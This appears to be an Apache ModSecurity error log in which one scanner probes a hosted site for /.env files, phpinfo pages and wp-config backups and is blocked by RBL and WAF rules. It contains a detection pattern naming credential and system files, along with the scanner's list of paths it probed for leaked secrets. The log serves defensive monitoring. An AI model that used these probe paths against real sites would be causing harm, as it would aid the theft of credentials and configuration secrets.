[Tue May 26 14:50:03.926701 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz6gAAAMM"]
[Tue May 26 14:50:03.929843 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz6wAAAKE"]
[Tue May 26 14:50:03.942174 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz8AAAALA"]
[Tue May 26 14:50:03.947194 2026] [security2:error] [pid 648203:tid 648411] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz7AAAANM"]
[Tue May 26 14:50:03.987349 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz9QAAAMw"]
[Tue May 26 14:50:04.006932 2026] [security2:error] [pid 648203:tid 648338] [client 45.148.10.95:31704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/php-info.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0BwAAAIo"]
[Tue May 26 14:50:04.012232 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlw7EQDDtxJNiDrdTz_AAAAKk"]
[Tue May 26 14:50:04.064139 2026] [security2:error] [pid 648203:tid 648429] [client 45.148.10.95:31912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/php.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0CgAAAOU"]
[Tue May 26 14:50:04.066596 2026] [security2:error] [pid 648203:tid 648410] [client 45.148.10.95:31842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/php_info.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0CwAAANI"]
[Tue May 26 14:50:04.080127 2026] [security2:error] [pid 648203:tid 648398] [client 74.249.173.207:2572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/ws.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0DwAAAMY"]
[Tue May 26 14:50:04.080545 2026] [security2:error] [pid 648203:tid 648423] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0BgAAAN8"]
[Tue May 26 14:50:04.137018 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0DgAAALk"]
[Tue May 26 14:50:04.141679 2026] [security2:error] [pid 648203:tid 648441] [client 45.148.10.95:31886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/portal/.env"] [unique_id "ahVlxLEQDDtxJNiDrdT0EwAAAPE"]
[Tue May 26 14:50:04.181660 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.5:5134] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php.swp"] [unique_id "ahVlxLEQDDtxJNiDrdT0HwAAAPk"]
[Tue May 26 14:50:04.213833 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:32004] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/product/.env"] [unique_id "ahVlxLEQDDtxJNiDrdT0JAAAAMA"]
[Tue May 26 14:50:04.226336 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0FgAAALw"]
[Tue May 26 14:50:04.228459 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0GgAAAM8"]
[Tue May 26 14:50:04.247132 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0IAAAAMs"]
[Tue May 26 14:50:04.300700 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:31818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/phpinfo.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0KwAAAKU"]
[Tue May 26 14:50:04.313818 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:32024] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/project/.env"] [unique_id "ahVlxLEQDDtxJNiDrdT0LAAAAKY"]
[Tue May 26 14:50:04.353335 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0JwAAAKM"]
[Tue May 26 14:50:04.356979 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0KgAAAN4"]
[Tue May 26 14:50:04.384859 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0LQAAAIs"]
[Tue May 26 14:50:04.392541 2026] [security2:error] [pid 648203:tid 648359] [client 45.148.10.95:31982] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/prod/.env"] [unique_id "ahVlxLEQDDtxJNiDrdT0LwAAAJ8"]
[Tue May 26 14:50:04.414998 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:31966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/public-api/.env"] [unique_id "ahVlxLEQDDtxJNiDrdT0MAAAAPU"]
[Tue May 26 14:50:04.458495 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:32024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/public/phpinfo.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0NQAAAJs"]
[Tue May 26 14:50:04.502787 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:32034] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/public_html/.env"] [unique_id "ahVlxLEQDDtxJNiDrdT0NwAAANg"]
[Tue May 26 14:50:04.519059 2026] [security2:error] [pid 648203:tid 648450] [client 45.148.10.95:31832] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0NgAAAPo"]
[Tue May 26 14:50:04.522170 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:31960] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0NAAAAPM"]
[Tue May 26 14:50:04.549260 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:31854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/production/.env"] [unique_id "ahVlxLEQDDtxJNiDrdT0OwAAAPw"]
[Tue May 26 14:50:04.598848 2026] [security2:error] [pid 648203:tid 648360] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0OgAAAKA"]
[Tue May 26 14:50:04.709071 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:31854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/public/.env"] [unique_id "ahVlxLEQDDtxJNiDrdT0RgAAAK0"]
[Tue May 26 14:50:04.718425 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0QAAAAO0"]
[Tue May 26 14:50:04.729418 2026] [security2:error] [pid 648203:tid 648334] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0QwAAAIY"]
[Tue May 26 14:50:04.798230 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:31966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0RwAAANw"]
[Tue May 26 14:50:04.821206 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0SgAAAN0"]
[Tue May 26 14:50:04.826605 2026] [security2:error] [pid 648203:tid 648429] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0TQAAAOU"]
[Tue May 26 14:50:04.885548 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0UAAAALI"]
[Tue May 26 14:50:04.910071 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0UwAAAP0"]
[Tue May 26 14:50:04.921417 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0WQAAAI8"]
[Tue May 26 14:50:04.929046 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0WAAAAPk"]
[Tue May 26 14:50:04.940857 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0XAAAAK4"]
[Tue May 26 14:50:04.963463 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0XwAAAJg"]
[Tue May 26 14:50:04.993821 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0ZQAAAMg"]
[Tue May 26 14:50:04.999951 2026] [security2:error] [pid 648203:tid 648444] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0ZwAAAPQ"]
[Tue May 26 14:50:05.006893 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0agAAAOw"]
[Tue May 26 14:50:05.039355 2026] [security2:error] [pid 648203:tid 648412] [client 45.148.10.95:31998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/qa/.env"] [unique_id "ahVlxbEQDDtxJNiDrdT0dAAAANQ"]
[Tue May 26 14:50:05.046756 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0cAAAANk"]
[Tue May 26 14:50:05.077984 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0cwAAAN4"]
[Tue May 26 14:50:05.157642 2026] [security2:error] [pid 648203:tid 648359] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0dwAAAJ8"]
[Tue May 26 14:50:05.209676 2026] [security2:error] [pid 648203:tid 648382] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0fAAAALY"]
[Tue May 26 14:50:05.255799 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0gQAAAL4"]
[Tue May 26 14:50:05.267815 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0hQAAAJ4"]
[Tue May 26 14:50:05.305416 2026] [security2:error] [pid 648203:tid 648406] [client 216.26.252.125:10359] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlxLEQDDtxJNiDrdT0GQAAAM4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:05.343801 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0iQAAAL8"]
[Tue May 26 14:50:05.396467 2026] [security2:error] [pid 648203:tid 648458] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0jAAAAQI"]
[Tue May 26 14:50:05.405844 2026] [security2:error] [pid 648203:tid 648334] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0jwAAAIY"]
[Tue May 26 14:50:05.409205 2026] [security2:error] [pid 648203:tid 648460] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0kgAAAQQ"]
[Tue May 26 14:50:05.426550 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0mAAAAN0"]
[Tue May 26 14:50:05.428148 2026] [security2:error] [pid 648203:tid 648413] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0lgAAANU"]
[Tue May 26 14:50:05.452339 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0ngAAALQ"]
